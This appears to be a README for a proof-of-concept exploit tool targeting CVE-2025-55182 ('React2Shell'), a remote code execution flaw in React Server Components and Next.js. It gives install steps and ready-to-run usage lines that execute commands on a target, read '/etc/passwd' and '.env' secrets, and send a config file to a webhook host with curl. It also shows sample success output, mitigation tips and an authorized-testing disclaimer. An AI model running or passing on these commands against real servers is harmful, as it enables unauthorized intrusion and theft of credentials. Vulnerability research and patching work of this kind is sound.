Share
## https://sploitus.com/exploit?id=5627E1B1-B9E5-5AF3-83BC-05AEC20954EC
# ๐Ÿšจ CVE-2025-55182 "React2Shell" โ€” Critical RCE in React Server Components



![CVE-2025-55182 Banner](https://github.com/user-attachments/assets/906281d4-6513-4a8c-8b60-6d8947341dfc)

[![Python 3.8+](https://img.shields.io/badge/Python-3.8+-blue.svg)](https://www.python.org/)
[![License](https://img.shields.io/badge/License-Research-red.svg)](LICENSE)
[![CVSS](https://img.shields.io/badge/CVSS-10.0-critical.svg)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
[![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20Windows%20%7C%20macOS-lightgrey.svg)]()

**Critical deserialization vulnerability in React Server Components leading to Remote Code Execution**



## ๐Ÿ“‹ Table of Contents
- [๐Ÿ“– Overview](#-overview)
- [โšก Quick Start](#-quick-start)
- [๐ŸŽฏ Affected Systems](#-affected-systems)
- [๐Ÿ”ง Usage Examples](#-usage-examples)
- [๐Ÿ“ Project Structure](#-project-structure)
- [๐Ÿ›ก๏ธ Mitigation Strategies](#๏ธ-mitigation-strategies)
- [โš ๏ธ Legal Disclaimer](#๏ธ-legal-disclaimer)
- [๐Ÿ”— References](#-references)

## ๐Ÿ“– Overview

CVE-2025-55182, dubbed "React2Shell", is a critical security vulnerability in **React Server Components (RSC)** that allows **unauthenticated remote code execution** through unsafe deserialization of server-side React components.

### ๐Ÿ“Š Technical Details

| Aspect | Details |
|--------|---------|
| **CVSS Score** | 10.0 (Critical) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | None |
| **Impact** | Confidentiality, Integrity, Availability |

### ๐Ÿ”ฅ Impact Assessment


  
    
      
        
        
        Remote Code Execution
      
      
        
        
        Data Exfiltration
      
      
        
        
        System Compromise
      
    
  


## โšก Quick Start

### Prerequisites
- Python 3.8 or higher
- Network access to target system (authorized testing only)

### Installation
```bash
# Clone the repository
git clone https://github.com/m3m0ryc0rrupt/CVE-2025-55182-PoC.git
cd CVE-2025-55182-PoC

# Install dependencies
python -m venv venv
source venv/bin/activate #Linux
venv\Scripts\activate #Windows
pip install -r requirements.txt
```

### Basic Usage
```bash
# Check if system is vulnerable
python CVE-2025-55182.py https://target.com "whoami"

# Read sensitive files
python CVE-2025-55182.py https://target.com "cat /etc/passwd"
```

## ๐ŸŽฏ Affected Systems

### โœ… Vulnerable
- React Server Components implementations
- Next.js (App Router + RSC)
- Vite RSC plugins
- Parcel RSC tools
- Redwood, Waku, and other RSC-based frameworks

### โŒ Not Affected
- Pure client-side React applications
- Applications not using Server Components
- Traditional SSR without RSC

## ๐Ÿ”ง Usage Examples

### Basic Command Execution
```bash
# System information
./CVE-2025-55182.py https://target.com "uname -a"
./CVE-2025-55182.py https://target.com "id"

# File operations
./CVE-2025-55182.py https://target.com "cat /app/.env"
./CVE-2025-55182.py https://target.com "ls -la /var/www"

# Data exfiltration
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/YOUR-ID -d @/app/config.json"
```

### Expected Output
When successful, you'll see:
```bash
$ ./CVE-2025-55182.py https://target.com "whoami"

 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ•”โ•โ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
 โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•  โ•‘ โ•‘  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•
 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘        โ–ˆโ–ˆโ•‘     โ•‘ โ•‘  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  
 โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘        โ–ˆโ–ˆโ•‘     โ•‘ โ•‘  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•”โ•โ•โ•  
 โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•‘     โ•šโ•โ•  โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
 โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•   โ•šโ•โ•          โ•šโ•โ•  โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•
                     CVE-2025-55182 โ‹ฎ Unauthenticated RCE
              Next.js + React Server Components = root shell

[+] CVE-2025-55182 Exploit
[+] Target  : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 โ€“ Command executed on server
[+] Server response:
node
```

## ๐Ÿ“ Project Structure

```
CVE-2025-55182/
โ”œโ”€โ”€ ๐Ÿ“œ README.md                 # This documentation
โ”œโ”€โ”€ ๐Ÿ“œ CVE-2025-55182.py        # Main RCE exploit
โ””โ”€โ”€ ๐Ÿ“œ requirements.txt          # Python dependencies
```

### Exploit Workflow
```mermaid
sequenceDiagram
    participant A as Attacker
    participant V as Vulnerable System
    participant E as Exploit Chain
    
    A->>V: 1. Send Malformed RSC Payload
    V->>E: 2. Unsafe Deserialization Trigger
    E->>V: 3. Code Execution via eval()
    V->>A: 4. Return Command Output
```

## ๐Ÿ›ก๏ธ Mitigation Strategies

### Immediate Actions
1. **Patch Immediately**
   - Update React to patched versions
   - Upgrade Next.js or RSC frameworks
   
2. **Security Audits**
   ```bash
   npm audit
   yarn audit
   pnpm audit
   ```

3. **Temporary Measures** (not substitutes for patching)
   - Implement WAF rules blocking RSC serialization patterns
   - Add request validation middleware
   - Monitor for suspicious payloads

### Long-term Protection
- Implement proper input validation
- Use safe serialization libraries
- Regular dependency updates
- Security scanning in CI/CD

## โš ๏ธ Legal Disclaimer



**โš ๏ธ WARNING: FOR AUTHORIZED SECURITY TESTING ONLY โš ๏ธ**



This Proof of Concept is provided for **educational purposes and authorized security testing only**. 

### ๐Ÿšซ Strictly Prohibited:
- Testing systems without explicit written permission
- Use in production environments without authorization
- Any illegal or malicious activities

### โœ… Permitted Use:
- Testing your own systems and applications
- Authorized penetration testing engagements
- Bug bounty programs within scope
- Security research in controlled environments

**You are solely responsible for ensuring compliance with all applicable laws and regulations.**

## ๐Ÿ”— References

- [CVE-2025-55182 Official Entry](https://vulners.com/cve/CVE-2025-55182)
- [React Security Advisory](https://github.com/facebook/react/security/advisories)
- [Next.js Security Updates](https://nextjs.org/blog/security)
- [NVD Vulnerability Database](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)

## ๐Ÿ“ž Contact & Reporting

Found a vulnerable system? **Responsibly disclose** to the affected organization's security team.



---
**Remember: With great power comes great responsibility. Use this knowledge to make the web safer for everyone.**

โญ If you found this useful, consider starring the repository!